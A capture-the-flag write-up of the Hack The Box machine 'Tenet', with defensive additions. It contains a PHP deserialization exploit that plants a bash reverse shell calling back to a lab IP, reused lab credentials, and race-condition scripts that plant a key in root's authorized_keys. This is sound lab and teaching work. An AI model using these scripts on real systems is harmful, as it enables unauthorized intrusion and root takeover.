Basic information

Port scan

The usual 22 and 80:

```shell
$ nmap -sC -sV 10.10.10.223
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-18 10:48 CST
Nmap scan report for 10.10.10.223
Host is up (0.074s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 cc:ca:43:d4:4c:e7:4e:bf:26:f4:27:ea:b8:75:a8:f8 (RSA)
|   256 85:f3:ac:ba:1a:6a:03:59:e2:7e:86:47:e7:3e:3c:00 (ECDSA)
|_  256 e7:e9:9a:dd:c3:4a:2f:7a:e1:e0:5d:a2:b0:ca:44:a8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.02 seconds
```

80

Browsing straight to the IP gives the Apache default page, so add tenet.htb to hosts:

It is a WordPress site. One comment hints at "sator php backup"; sator is a subdomain, so add it to hosts as well:

```
10.10.10.223 tenet.htb sator.tenet.htb
```

sator.tenet.htb

Visiting it directly again gives the Apache default page, but with the earlier hint the .bak backup of the file is easy to find:

PHP deserialization

Reading the sator code, it is clearly a PHP deserialization issue:

exploit

So abuse the deserialization directly to write a PHP file and trigger a reverse shell:

```shell
php exp.php

python3 -c 'import pty;pty.spawn("/bin/bash")'
```

exp.php

```php
<?php
// Local copy of the class from sator.php: serialize() needs the class name
// and property names, and the target's __destruct does the file write.
class DatabaseExport
{
    public $user_file = 'test.php';
    public $data = '<?php exec("/bin/bash -c \'bash -i > /dev/tcp/10.10.14.11/4445 0>&1\'"); ?>';

    public function __destruct()
    {
        file_put_contents(__DIR__ . '/' . $this->user_file, $this->data);
        echo '[] Database updated';
    }
}

// First request: the serialized object in ?arepo= is unserialized on the
// server and its __destruct writes test.php into the web root.
$url = 'http://10.10.10.223/sator.php?arepo=' . urlencode(serialize(new DatabaseExport));
$response = file_get_contents("$url");
// Second request: executing test.php opens the reverse shell.
$response = file_get_contents("http://10.10.10.223/test.php");
// Note: the same __destruct also runs locally when this script exits, so a
// test.php is written next to exp.php as a side effect.
?>
```
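The defender's counterpart to the request above is spotting it in the web server log. The following is an added example, not code from the writeup or the box: it hunts Apache access-log lines for a query-string value that starts with a serialized PHP object (`O:<len>:"Class"`), either plain or percent-encoded, which is the input shape an `unserialize()` sink such as `sator.php?arepo=` receives. The sample log lines, the `SAMPLE_LOG` variable and the function names are constructed for this example.

```shell
#!/bin/sh
# Added example (not from the original writeup): flag Apache access-log
# requests whose query-string value carries a serialized PHP object.

# Constructed sample lines in Apache common log format; the payloads are
# illustrative, not captured traffic. Line 3 shows how Apache logs a request
# whose quotes arrived unencoded (written as \").
SAMPLE_LOG='10.10.14.11 - - [18/Jan/2021:10:52:01 +0800] "GET /sator.php?arepo=O%3A14%3A%22DatabaseExport%22%3A1%3A%7Bs%3A9%3A%22user_file%22%3Bs%3A8%3A%22test.php%22%3B%7D HTTP/1.1" 200 512
10.10.14.11 - - [18/Jan/2021:10:52:02 +0800] "GET /sator.php?arepo=users HTTP/1.1" 200 110
10.10.14.11 - - [18/Jan/2021:10:52:03 +0800] "GET /sator.php?arepo=O:8:\"stdClass\":0:{} HTTP/1.1" 200 110
10.10.14.11 - - [18/Jan/2021:10:52:04 +0800] "GET /index.php?p=1 HTTP/1.1" 200 2048'

# Matches a parameter value (after = or &) beginning with O:<digits>:" where
# the colon may be %3A and the quote may be %22 or a log-escaped \".
PHP_OBJECT_RE='[=&]O(:|%3[Aa])[0-9]+(:|%3[Aa])(%22|\\?")'

# Read log lines on stdin; print "client-ip request-path" for each hit.
# Field 7 of the common log format is the request path.
find_php_object_requests() {
    grep -E "$PHP_OBJECT_RE" | awk '{ print $1, $7 }'
}

# Number of hits in the constructed sample, printed on stdout.
count_sample_hits() {
    printf '%s\n' "$SAMPLE_LOG" | find_php_object_requests | wc -l | tr -d ' '
}

# Run over the sample when executed directly.
printf '%s\n' "$SAMPLE_LOG" | find_php_object_requests

# Against a live log the same function is used as a filter, e.g.
#   find_php_object_requests < /var/log/apache2/access.log
```

The pattern only catches an object at the start of a GET parameter value; payloads in POST bodies, cookies or base64 wrappers need the same check applied to those fields, and the real fix is on the server side (never passing request data to `unserialize()`, or using a data format such as JSON with no object instantiation).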

Information gathering

The MySQL username and password are then found in wordpress/wp-config.php:

```php
/** MySQL database username */
define( 'DB_USER', 'neil' );

/** MySQL database password */
define( 'DB_PASSWORD', 'Opera2112' );
```

These are also the SSH username and password.

user flag

SSH in directly and read user.txt:

Privilege escalation information

sudo -l shows that the current user may run /usr/local/bin/enableSSH.sh with sudo:

Reading that file, addkey copies /tmp/ssh-XXXXXXXX into /root/.ssh/authorized_keys. That makes a race condition possible: write our own public key into /tmp/ssh-XXXXXXXX so that it is the content copied into /root/.ssh/authorized_keys:

Race condition && root flag

Just two scripts: one writes the public key into tmp, the other calls enableSSH.sh via sudo. Once the race is won, log in as root and read root.txt:

add_rsa.sh

```bash
#!/bin/bash
# Keep overwriting every /tmp/ssh-* file with our public key;
# "ssh-rsa key" is a placeholder for the actual public key line.
while true
do
    echo "ssh-rsa key" | tee /tmp/ssh-*
done
```

1.sh

```bash
#!/bin/bash
# Keep invoking the sudo-allowed script so its temp file is created and
# consumed over and over, giving add_rsa.sh a window to win.
while true
do
    sudo /usr/local/bin/enableSSH.sh
done
```
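What makes the race above possible is a privileged script staging data in a predictable, shared-writable path under /tmp and then trusting whatever is there when it reads it back. The following is an added example, not code from the writeup or from the box's enableSSH.sh: a hardened version of the "stage a key, then append it to authorized_keys" pattern. It stages the key in a private directory from `mktemp -d` under `umask 077`, refuses the staged file unless it is a regular, caller-owned, non-group/other-writable file, and only accepts lines that look like an SSH public key. The function names, the `KEY_RE` pattern and the sample key are constructed; the target file is a parameter so the demo never touches /root.

```shell
#!/bin/sh
# Added example (not the box's script): hardened key staging for a
# privileged helper. Compare with a fixed /tmp/ssh-XXXXXXXX path that anyone
# can overwrite between creation and use.

# Accept only a public-key line: key type followed by a base64 blob.
# Constructed, minimal check for this example.
KEY_RE='^(ssh-(rsa|ed25519)|ecdsa-sha2-nistp(256|384|521)) [A-Za-z0-9+/=]+'

# Return 0 only if $1 is a regular file (not a symlink), owned by the caller,
# and not writable by group or others. A staged file failing any of these
# could have been planted or swapped by another local user.
check_staged_file() {
    f=$1
    [ -n "$f" ] || return 1
    [ ! -L "$f" ] || return 1      # refuse symlinks outright
    [ -f "$f" ] || return 1        # must be a regular file
    # -prune keeps find on the file itself; any match means "unsafe".
    unsafe=$(find "$f" -prune \( ! -user "$(id -un)" -o -perm -002 -o -perm -020 \) -print)
    [ -z "$unsafe" ]
}

# Stage $1 (a key line) in a private temp dir, verify it, append to $2.
# A real helper would pass /root/.ssh/authorized_keys as $2.
install_key() {
    key=$1
    target=$2
    saved_umask=$(umask)
    umask 077                      # directory and file are private to us
    dir=$(mktemp -d) || { umask "$saved_umask"; return 1; }
    staged="$dir/key"
    printf '%s\n' "$key" > "$staged"
    umask "$saved_umask"
    if ! check_staged_file "$staged" || ! grep -Eq "$KEY_RE" "$staged"; then
        rm -rf "$dir"
        return 1
    fi
    cat "$staged" >> "$target"
    rm -rf "$dir"
}

# Self-check in a scratch directory with a constructed key; prints the
# number of ssh-ed25519 lines that reached the target file.
demo() {
    scratch=$(mktemp -d)
    auth="$scratch/authorized_keys"
    key='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyConstructedForThisDemo demo@example'
    install_key "$key" "$auth" && grep -c 'ssh-ed25519' "$auth"
    rm -rf "$scratch"
}

demo
```

The ownership and permission test is the part a `sudo`-runnable script cannot skip: a file in a sticky /tmp that is world-writable, or a symlink the attacker controls, is exactly what the loop in add_rsa.sh relies on, and `check_staged_file` rejects both before anything is appended.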

References